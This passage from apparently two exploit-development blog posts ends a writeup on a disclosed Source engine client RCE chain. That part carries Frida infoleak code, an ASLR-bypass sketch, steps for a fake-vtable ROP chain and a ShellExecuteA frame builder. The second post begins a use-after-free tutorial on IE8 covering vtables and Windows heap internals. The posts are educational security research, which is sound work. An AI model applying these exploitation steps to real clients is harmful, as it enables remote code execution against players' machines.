    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}
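The selection and rebasing steps can be reproduced offline from the log above. Windows maps images at 64 KB-aligned bases, so a pointer into engine.dll shares its low 16 bits with its offset from the module base. That is why matching the low WORD against the known Engine_Leak2 offset singles out the right DWORD. Here is a Python sketch using a subset of the leaked DWORDs printed above.

```python
from typing import Dict, Optional


def find_leak(leaked: Dict[int, int], known_offset: int) -> Optional[int]:
    """Return the first DWORD whose low 16 bits match the known offset's low 16 bits."""
    for _, value in sorted(leaked.items()):
        if value & 0xFFFF == known_offset & 0xFFFF:
            return value
    return None


def engine_base(leaked_pointer: int, known_offset: int) -> Optional[int]:
    """Subtract the offset and reject results that are not 64 KB aligned."""
    base = (leaked_pointer - known_offset) & 0xFFFFFFFF
    return base if base & 0xFFFF == 0 else None


# A few (buffer offset -> value) pairs from the "Intercepting ReadBytes" log above.
leaked = {0xCC: 0xAFDD68, 0xD0: 0xA097D0C, 0xD8: 0xAB780C, 0xE4: 0x7AC9AB8D, 0xF8: 0xAB77D4}
ENGINE_LEAK2 = 0x23AB8D   # Engine_Leak2 offset reported in the log for this build

ptr = find_leak(leaked, ENGINE_LEAK2)
print(hex(ptr), hex(engine_base(ptr, ENGINE_LEAK2)))  # 0x7ac9ab8d 0x7aa60000
```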

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet, sweet calculator. The nice part about driving Frida from Python is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length.

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker-known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug is used by creating a specially crafted SVC_PacketEntities netmessage which calls CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value exploits the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the returned pointer so that it points to sv_mumble_positionalaudio->m_pszString instead (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer redirects execution by pretending to be an IClientNetworkable* object and redirecting the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain loads the necessary arguments to call ShellExecuteA, then executes whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe as a proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.
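For reference, here is how a 32-bit stdcall call frame such as ShellExecuteA's is laid out when the function is entered through a ret rather than a call. The function address is popped into EIP. The function then sees the next DWORD as its return address, followed by its six arguments (hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd). This Python sketch only packs that layout. Every address in it is a hypothetical placeholder, and the gadgets that load these values in the real chain are not shown in this post.

```python
import struct
from typing import Sequence

SW_SHOWNORMAL = 1  # nShowCmd value from the Win32 API


def stdcall_frame(func: int, ret_addr: int, args: Sequence[int]) -> bytes:
    """Stack image for entering a 32-bit stdcall function via `ret`."""
    return struct.pack(f"<{2 + len(args)}I", func, ret_addr, *args)


# Hypothetical addresses: in practice these are derived from the leaked module base.
SHELLEXECUTEA = 0x76540000   # placeholder for ShellExecuteA's resolved address
RETURN_TO = 0x7AA61234       # placeholder: where execution continues afterwards
LPFILE = 0x0BADF00D          # placeholder: pointer to "C:/Windows/System32/winver.exe"

frame = stdcall_frame(SHELLEXECUTEA, RETURN_TO,
                      [0, 0, LPFILE, 0, 0, SW_SHOWNORMAL])  # hwnd, verb, file, params, dir, show
print(len(frame), frame[:4].hex())  # 32 00005476
```

Passing NULL for lpOperation lets ShellExecuteA use the default verb, which keeps the chain from needing a second string.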

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action; be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

For the Frida exploit chain:

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than that of Source. There hasn’t been much public research on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00


Browser exploitation is a topic that has been incredibly daunting for me. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I needed to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn and am still a novice at kernel exploitation, I realized it was my willingness to just jump in, irrespective of the difficulty level, that eventually helped me grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, because not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but you also need to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, each of which is difficult (at least to me) to understand on its own. Plus, browser-specific mitigations have also been a determining factor in my putting off learning this subject.

What has always been frightening is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for me. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on, ask myself “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and attempt to answer that question. In addition, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them, but it takes that first walkthrough for me.

Given this learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now that Advanced Windows Exploitation (AWE) has been canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this series will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely not for the next few either. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As mentioned above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness' sake I will take a swing at explaining them. Essentially what happens is this: a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Heap memory is measured in units known as blocks, and on x86 systems a block is 0x8 bytes, or 2 DWORDs. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these later in this post). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager to service allocation requests.

Let’s say the allocation was at the memory address 0x15000, and that the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is pseudo-speak and should just be taken at a high level for now). When this allocation is freed and you go back and dereference the address again, you should no longer expect to see the 0x41s. Depending on the heap, the chunk may contain leftover data or heap bookkeeping, or the memory may not be accessible at all (e.g. something like ???? in WinDbg), as long as the address hasn’t been used to service another allocation request and is still in a free state.

The vulnerability arises when the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, even though it is in a “free” state. This usually results in an exception, as the program is attempting to access and/or dereference memory that simply isn’t valid anymore, and the program crashes.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they make heavy use of C++ features such as classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is that in classes you can restrict where the members of the class can be accessed, with access specifiers such as private, protected, or public. By default, members of classes are private, meaning the members can only be accessed by the class itself (derived classes can only access members that are declared protected or public). We will talk about inheritance in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
public:
	// This is our user defined constructor
	classOne()
	{
		cout << "Hello from the classOne constructor" << endl;
	}

	// This is our user defined destructor
	// Note: it is NOT virtual, so "delete" through a classOne* only runs this destructor
	// (formally undefined behavior for a derived object; MSVC statically calls ~classOne)
	~classOne()
	{
		cout << "Hello from the classOne destructor!" << endl;
	}

	virtual void sharedFunction(){};				// Prototype a virtual function
	virtual void sharedFunction1(){};				// Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
public:
	// This is our user defined constructor
	classTwo()
	{
		cout << "Hello from the classTwo constructor!" << endl;
	}

	// This is our user defined destructor
	~classTwo()
	{
		cout << "Hello from the classTwo destructor!" << endl;
	}

	void sharedFunction()
	{
		cout << "Hello from the classTwo sharedFunction()!" << endl;		// Create A DIFFERENT function definition of sharedFunction()
	}

	void sharedFunction1()
	{
		cout << "Hello from the classTwo sharedFunction1()!" << endl;		// Create A DIFFERENT function definition of sharedFunction1()
	}
};

// This is another derived/sub class
class classThree : public classOne
{
public:
	// This is our user defined constructor
	classThree()
	{
		cout << "Hello from the classThree constructor" << endl;
	}

	// This is our user defined destructor
	~classThree()
	{
		cout << "Hello from the classThree destructor!" << endl;
	}

	void sharedFunction()
	{
		cout << "Hello from the classThree sharedFunction()!" << endl; 	// Create A DIFFERENT definition of sharedFunction()
	}

	void sharedFunction1()
	{
		cout << "Hello from the classThree sharedFunction1()!" << endl; 	// Create A DIFFERENT definition of sharedFunction1()
	}
};

// Main function
int main()
{
	// Create instances of the derived classes and store their addresses in pointers to the base/main class
	// Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so a classOne* may point to a classTwo or classThree object
	// The classOne constructor will get called twice (once for each object created), and the classTwo + classThree constructors are called once each (total of 4)
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	// Invoke the virtual functions
	c1->sharedFunction();
	c1_2->sharedFunction();
	c1->sharedFunction1();
	c1_2->sharedFunction1();

	// Destructors are called when the object is explicitly destroyed with delete
	delete c1;
	delete c1_2;

	return 0;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor has the same name as the class. So, for instance, the constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Their general purpose is to initialize the variables within a class whenever a class object is created. Just like declaring a variable of a structure type, creating a class object can be done as such: classOne c1. In our case, we instead create the objects on the heap with new and refer to them through classOne pointers (classOne* c1 = new classTwo), which means we access members via pointers rather than directly. Essentially, just know that whenever a class object is created (new classTwo in our case), its constructor is called.

In addition to a constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is called whenever the lifetime of a class object ends. For an object declared as a local variable, that happens when it goes out of scope; for an object created with new, as in our case, it happens when the delete operator is invoked against one of the previously created class objects (c1 and c1_2). The destructor is the inverse of the constructor, meaning it is called whenever the object is being destroyed. Note that a destructor has no return type and does not accept function arguments.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
	int var1;
	int var2;
};

As you know, the first member of this struct is int var1. The same holds true for C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exist is that they allow a developer to prototype a function in a main class, but redefine the function in a derivative class. This works because the derivative class inherits the variables, functions, etc. of its “parent” class. This can be seen in the above code snippet, repeated here for convenience: classOne* c1 = new classTwo;. This creates an object of classTwo, a derivative class of classOne, and stores its address in the classOne pointer c1. Virtual functions ensure that whenever a function is called through such a pointer (e.g. c1), the definition that runs is the one belonging to the object's actual class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a virtual function is called on a class object, the function definition appropriate to that object is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested in the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically open a source window with the actual C++ code, and will follow along in it as you step through the code.

In WinDbg, step through the code with t until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc. (the exact addresses will differ in your build).

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table: essentially an array of pointers to the class's virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

Recall from a few images ago that when we dumped the table, we saw our two virtual function addresses. This time, program execution is going to read the table at an offset of 0x8, which holds a pointer to sharedFunction1 instead of sharedFunction!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructors will be called. Because classOne's destructor is not declared virtual and we delete both objects through classOne pointers, only the classOne destructor will be called (strictly speaking, deleting a derived object through a base-class pointer without a virtual destructor is undefined behavior in C++; MSVC simply calls ~classOne here). This is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED C runtime function _free_dbg, to free the object's memory. Note that this would normally be a call to the C runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	delete c1;
	delete c1_2;

	// Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
	// (deliberately undefined behavior: c1 is now a dangling pointer)
	c1->sharedFunction();

	return 0;
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configures WinDbg to automatically attach to and analyze a program that has just crashed. The code we just added should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of gflags.exe, a tool that ships with the debugging tools in the Windows SDK. gflags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process: gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by applying “patterns” to heap allocations. E.g. if a chunk is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

With PageHeap enabled, let’s run the vulnerable code. Run the rebuilt .exe again, and WinDbg should fire up.

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where we have seen this before? This looks to be an attempted call to a virtual function through an object that no longer exists! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case: the class object we are trying to call a virtual function from has already been freed, so we are calling through memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourselves with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr - The best explanation of the LFH, and of heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it interacts with the back-end manager, and much, if not all, of the information provided here comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and techniques leveraging the heap internals described here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass an address as an argument to dt ntdll!_HEAP.) This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP) structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB (ArraySize is counted in 8-byte blocks, so 0x80 blocks are 1,024 bytes and 0x800 blocks are 16,384 bytes). This also means that for each heap, on Windows 7, there are technically only two of these structures: one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, a linked list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which shows another _HEAP_LIST_LOOKUP structure, reached via the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 blocks in size, which is the smallest range possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunk sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints is indexed to find an appropriately sized free chunk for use by the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH: the LFH is used to service requests that meet the above heuristic requirement, which is 18 consecutive allocations of the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first chunk handed out for the next request of the same size. This will prove useful later on. Note that this is no longer the case on newer systems, where the heap has a much greater degree of randomization.

In any event, it is still worth talking about the LFH in its entirety, and about the heap on Windows in general. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting, memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap managers, let’s talk about how heaps are used on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that the heap is explained far more thoroughly in Chris’ paper; the above explanations are not comprehensive, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code at first; focus on the actual root cause, which is that a CPhraseElement is freed when its outerText property is reset. However, after this object has been freed, a reference to it still remains within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. As we saw previously, accessing a virtual function for a freed object will result in a crash, and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contain a proof of concept similar to the one above. Note that the element names in the description do not match the element names in the HTML: when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact that we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, in the same way as earlier, to see if we can determine why this crash occurred.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according to the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see freed memory being dereferenced. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr [eax+70h]. If we unassemble the code around the current instruction pointer (with the u command), we can see something that is very reminiscent of the assembly instructions we showed earlier to fetch a virtual function.

Recall that last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what the table holds at a specific offset. Dereferencing the vptr at an offset of 0x8, for instance, would take the second entry of the virtual function table (entry 1 is at 0x0, entry 2 at 0x8, entry 3 at 0x10, entry 4 at 0x18, and so on) and call it.
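The offset-to-entry arithmetic is easy to get wrong, so here is a minimal JavaScript sketch (runnable under Node.js, not inside IE8) that converts a byte offset into a zero-based vtable slot index. The helper name `slotIndex` is hypothetical; it only assumes that every vtable entry is exactly one pointer wide (8 bytes on x64, 4 bytes on x86).

```javascript
// Convert a byte offset into a virtual function table into a zero-based slot index.
// ptrSize is 8 on x64 and 4 on x86, because each vtable entry is one pointer wide.
function slotIndex(byteOffset, ptrSize) {
  if (byteOffset % ptrSize !== 0) {
    throw new Error("offset is not pointer-aligned");
  }
  return byteOffset / ptrSize;
}

// x64: offset 0x8 is the second entry (index 1); 0x18 is the fourth entry (index 3).
console.log(slotIndex(0x8, 8));  // 1
console.log(slotIndex(0x18, 8)); // 3

// x86: the [eax+70h] read from this crash selects index 28, i.e. the 29th entry.
console.log(slotIndex(0x70, 4)); // 28
```

The same offset means a different entry depending on pointer size, which is one reason the 32-bit routine below looks slightly different from the 64-bit one.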

However, this methodology can look different depending on whether you are on a 32-bit or a 64-bit system, and compiler optimizations can change it as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the fetching of the vptr via [ecx]. ECX holds a pointer to the object, and the first DWORD of the object is the vptr, so mov eax, dword ptr [ecx] loads the vptr into EAX. EAX, which now contains the pointer to the virtual function table, is then used to go 0x70 bytes into the table and dereference that address, which yields one of the virtual functions (whichever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.
